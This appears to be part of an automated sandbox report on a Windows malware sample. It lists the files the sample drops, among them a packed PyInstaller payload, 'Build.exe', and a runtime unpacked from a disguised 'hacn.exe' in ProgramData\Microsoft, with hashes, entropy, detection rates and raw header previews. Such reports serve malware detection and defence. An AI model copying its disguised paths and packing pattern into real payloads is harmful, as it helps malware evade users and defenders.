Preview:	L...?..f.............debug$S........\|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........U....c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP...................].x....&.f...Wq..........5.......C:\Users\user\AppData\Local\Temp\RESBBF6.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.r.t.u.5.e.v...d.l.l.....(.....L.e.

C:\Users\user\AppData\Local\Temp\RESBDBB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x708, 10 symbols, created Mon Sep 2 16:22:23 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1984
Entropy (8bit):	4.585571220908751
Encrypted:	false
SSDEEP:	24:HOK9AVXOjq7H8WwKMCWYN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+eUZ:Egjq7c1KMCWYKluOulajfqXSfbNtmhZZ
MD5:	6EB7229066738192E5C4DA956614C8E0
SHA1:	BE04040F8791EE1F4ED1BBDD268B21FFD5DA10D9
SHA-256:	AE626A40410B3EA7887F9EC373981326170166A88587C6C97F35429D6767871B
SHA-512:	6E6F97840223CBA0D35429A3CE5C7A40F4F6A6C32B4760F4F6F7F141D7924C0D6C0278142EFE32255B618EDD8D8B7ECB65E4E6C591FA5E11C22420F617E75102
Malicious:	false
Preview:	L...?..f.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP..................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESBDBB.tmp.-.<....................a..Microsoft (R) CVTRES.~.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.

C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23365018
Entropy (8bit):	7.999071358180758
Encrypted:	true
SSDEEP:	393216:roNLbkNjGJH0LImPsLlp4noNpZRZNKnD0FtIgk35EAOijXiv0ij:roht0L/5oN9FthUXiv
MD5:	6123E1B1546C5468EDD1C8AA70F14A12
SHA1:	1C19B5DF272B4593B9C88735BC69F4F099B64A7F
SHA-256:	7BE9183967887D473093A15C1CB3E925D12B63B5C0CDE3013E449CB2D2C9C76F
SHA-512:	6AA6F7C91AD38BF31909724CDFAD6C048CD4DB8A53C897F0103617EAEBEF66C8A0264F60F826AE728FD28F52AD431ACF99C37D8ABA849E2B60FFF122D285266E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109440
Entropy (8bit):	6.642252418996898
Encrypted:	false
SSDEEP:	1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
MD5:	49C96CECDA5C6C660A107D378FDFC3D4
SHA1:	00149B7A66723E3F0310F139489FE172F818CA8E
SHA-256:	69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
SHA-512:	E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..\|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..\|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49432
Entropy (8bit):	7.814765644394208
Encrypted:	false
SSDEEP:	1536:qFvfmA9WmLbAsqCWrTZI+ufIsCViS7SyhxG:YfhAXplI+qIsCViSk
MD5:	C413931B63DEF8C71374D7826FBF3AB4
SHA1:	8B93087BE080734DB3399DC415CC5C875DE857E2
SHA-256:	17BFA656CABF7EF75741003497A1C315B10237805FF171D44625A04C16532293
SHA-512:	7DC45E7E5ED35CC182DE11A1B08C066918920A6879FF8E37B6BFBDD7D40BFFA39EA4ACA778AA8AFB99C81A365C51187DB046BCEB938CE9ACE0596F1CF746474F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B......B.i.C...B.i.....B.i.G...B.i.F...B.i.A...B..C...B..C...B...C..B..O...B..B...B......B..@...B.Rich..B.........................PE..d....k.d.........." ...$............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	253720
Entropy (8bit):	6.554150968006557
Encrypted:	false
SSDEEP:	6144:3V9E1CyOa72oP+pG1/dgD09qWM53pLW1ADDtLRO75e:jEgyOa72jw1/d4VVhLE5e
MD5:	BE315973AFF9BDEB06629CD90E1A901F
SHA1:	151F98D278E1F1308F2BE1788C9F3B950AB88242
SHA-256:	0F9C6CC463611A9B2C692382FE1CDD7A52FEA4733FFAF645D433F716F8BBD725
SHA-512:	8EA715438472E9C174DEE5ECE3C7D9752C31159E2D5796E5229B1DF19F87316579352FC3649373DB066DC537ADF4869198B70B7D4D1D39AC647DA2DD7CFC21E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.`...`...`.......`..,....`..,....`..,....`..,....`.......`.......`...`...`.......`.......`.......`....r..`.......`..Rich.`..........................PE..d....k.d.........." ...$.x...<......\|...............................................>.....`.........................................0T..P....T...................'......./......P.......T...........................p...@............................................text...-w.......x.................. ..`.rdata..\|............\|..............@..@.data....*...p...$...T..............@....pdata...'.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.661180108527419
Encrypted:	false
SSDEEP:	768:d35lZrQBD7Xiyfulct4ziTpojMIsOIHQ5YiSyvaAMxkEr4:p5YM8ulcKljMIsOIHC7SyAxn4
MD5:	B227BF5D9FEC25E2B36D416CCD943CA3
SHA1:	4FAE06F24A1B61E6594747EC934CBF06E7EC3773
SHA-256:	D42C3550E58B9AA34D58F709DC65DC4EE6EEA83B651740822E10B0AA051DF1D7
SHA-512:	C6D7C5A966C229C4C7042EF60015E3333DAB86F83C230C97B8B1042231FDB2A581285A5A08C33AD0864C6BD82F5A3298964AB317736AF8A43E7CAA7669298C3E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,'@.MI..MI..MI..5...MI.:3H..MI.:3L..MI.:3M..MI.:3J..MI..2H..MI..5H..MI.G0H..MI..MH..MI..2D..MI..2I..MI..2...MI..2K..MI.Rich.MI.........PE..d....l.d.........." ...$.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.917624775312671
Encrypted:	false
SSDEEP:	1536:gQMcTNoOKoMWf9p5pYRCyO1yKprdsf2+iyfyiMIsZ1pc7SyExpg:9TiNo/VyMy3KpM2+id5IsZ1pcN
MD5:	542EAB18252D569C8ABEF7C58D303547
SHA1:	05EFF580466553F4687AE43ACBA8DB3757C08151
SHA-256:	D2A7111FEEAACAC8B3A71727482565C46141CC7A5A3D837D8349166BEA5054C9
SHA-512:	B7897B82F1AA9D5AA895C3DE810DAB1AA335FDF7223E4FF29B32340AD350D9BE6B145F95A71C7BC7C88C8DF77C3F04853AE4D6F0D5A289721FC1468ECBA3F958
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..'..lt..lt..lt...t..lt..mu..lt..iu..lt..hu..lt..ou..lt..mu..ltM.mu..lt..mt`.lt..au<.lt..lu..lt..t..lt..nu..ltRich..lt................PE..d....l.d.........." ...$. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44312
Entropy (8bit):	7.711762406623848
Encrypted:	false
SSDEEP:	768:1deiwaiMMQ8HgVJbz3p8GQh4dsKwGn2Spk+XIsLwiFy5YiSyvZAMxkEa:lKFHEz3LwG2V+XIsLwiFw7SyJx+
MD5:	1A34253AA7C77F9534561DC66AC5CF49
SHA1:	FCD5E952F8038A16DA6C3092183188D997E32FB9
SHA-256:	DC03D32F681634E682B02E9A60FDFCE420DB9F26754AEFB9A58654A064DC0F9F
SHA-512:	FF9EEB4EDE4B4DD75C67FAB30D0DEC462B8AF9CA6ADC1DCAE58F0D169C55A98D85BB610B157F17077B8854EC15AF4DFAB2F0D47FA9BC463E5B2449979A50293A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.......e..N....e..N....e..N....e..N....e.......e...e..Re.......e.......e.......e....{..e.......e..Rich.e..................PE..d....l.d.........." ...$.p..........Pm....................................................`.............................................P.......h............ ..x...........X.......................................`y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1438582
Entropy (8bit):	5.590818209842686
Encrypted:	false
SSDEEP:	24576:mQR5pATuz/R5lUKdcubgAnyfbPer0iwhxdYf9Pqe9HH4:mQR5p1/RpL0
MD5:	5B5EDC46B4A4F69E88049D94A5FB26A1
SHA1:	C4B4813EDAFE8EEE13A12817103FC5550075E0EC
SHA-256:	114F8953BFB6F74630C6E17806F978A5B0EE8E1B26EFA5797C3FDE56EE9336D0
SHA-512:	3C444F59B196A95B034D6452A1F4541E969868B75780B777833704190E9C4653B90B2B80AE89AED74FB17FD8F3504901F09E00D1D0B8163299C4F0E28A8A4556
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1626904
Entropy (8bit):	7.952685381728523
Encrypted:	false
SSDEEP:	49152:1qs3Gg3Doju8k8lHFLRUYY1SVma7A5as1rM1CPwDvt3uFlDC:EsWg3uu6ldUYYoLA5e1CPwDvt3uFlDC
MD5:	78EBD9CB6709D939E4E0F2A6BBB80DA9
SHA1:	EA5D7307E781BC1FA0A2D098472E6EA639D87B73
SHA-256:	6A8C458E3D96F8DD3BF6D3CACC035E38EDF7F127EEE5563B51F8C8790CED0B3E
SHA-512:	B752769B3DE4B78905B0326B5270091642AC89FF204E9E4D78670791A1FA211A54D777AEEF59776C21F854C263ADD163ADAEF6A81B166190518CFAAF4E2E4122
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d......d.........." ...#.........P9..aO..`9...................................R...........`..........................................xO.....sO.h....pO.......K..............Q.....................................@mO.@...........................................UPX0.....P9.............................UPX1.........`9.....................@....rsrc........pO.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\python311.dll

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1703192
Entropy (8bit):	7.993653516397076
Encrypted:	true
SSDEEP:	49152:IHqk+Tq+DBrHf06FQAXUtzI0XTLe0EJNgZAem/Y:sOqCTfXjei0EJNlen
MD5:	5F6FD64EC2D7D73AE49C34DD12CEDB23
SHA1:	C6E0385A868F3153A6E8879527749DB52DCE4125
SHA-256:	FF9F102264D1944FBFAE2BA70E7A71435F51A3E8C677FD970B621C4C9EA71967
SHA-512:	C4BE2D042C6E4D22E46EACFD550F61B8F55814BFE41D216A4DF48382247DF70BC63151068513855AA78F9B3D2F10BA6A824312948324C92DE6DD0F6AF414E8AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ed..Ed..Ed......Gd......Kd......Id......Md......Ad..L.{._d......Nd..Ed.. e.._...d.._...Dd.._...Dd.._...Dd..RichEd..................PE..d....k.d.........." ...$..........D...]...D...................................^...........`.........................................H.].......].......].......V..0..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.439415387461292
Encrypted:	false
SSDEEP:	768:sjW1g3ldg8d77x55iCpJT9IsQGH/5YiSyvmAMxkE/3:sjW1yldgy75ZT9IsQGHx7SyMxL3
MD5:	45D5A749E3CD3C2DE26A855B582373F6
SHA1:	90BB8AC4495F239C07EC2090B935628A320B31FC
SHA-256:	2D15C2F311528440AA29934920FB0B015EAF8CBE3B3C9AD08A282A2D6BA68876
SHA-512:	C7A641D475A26712652A84B8423155CA347E0EC0155BD257C200225A64752453E4763B8885D8FB043B30E92AE023A501FFF04777BA5CFE54DA9A68071F25FBEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..'..'..'...'..'...&..'...&..'...&..'...&..'...&..'..'..'...&..'...&..'...&..'..c'..'...&..'Rich..'........................PE..d....k.d.........." ...$.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\iqA8j9yGcd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302360
Entropy (8bit):	7.987158878300502
Encrypted:	false
SSDEEP:	6144:6k/MXu7k+2xmvrSSrDZm9sR40BQG1pK1fS3KBG/oLwC8t+Ht:6kiuX2xmWIDE9uIpS363LwZKt
MD5:	8C42FCC013A1820F82667188E77BE22D
SHA1:	FBA7E4E0F86619AAF2868CEDD72149E56A5A87D4
SHA-256:	0E00B0E896457ECDC6EF85A8989888CCFBF05EBD8D8A1C493946A2F224B880C2
SHA-512:	3A028443747D04D05FDD3982BB18C52D1AFEE2915A90275264BF5DB201BD4612090914C7568F870F0AF7DFEE850C554B3FEC9D387334D53D03DA6426601942B4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D\|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75002\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
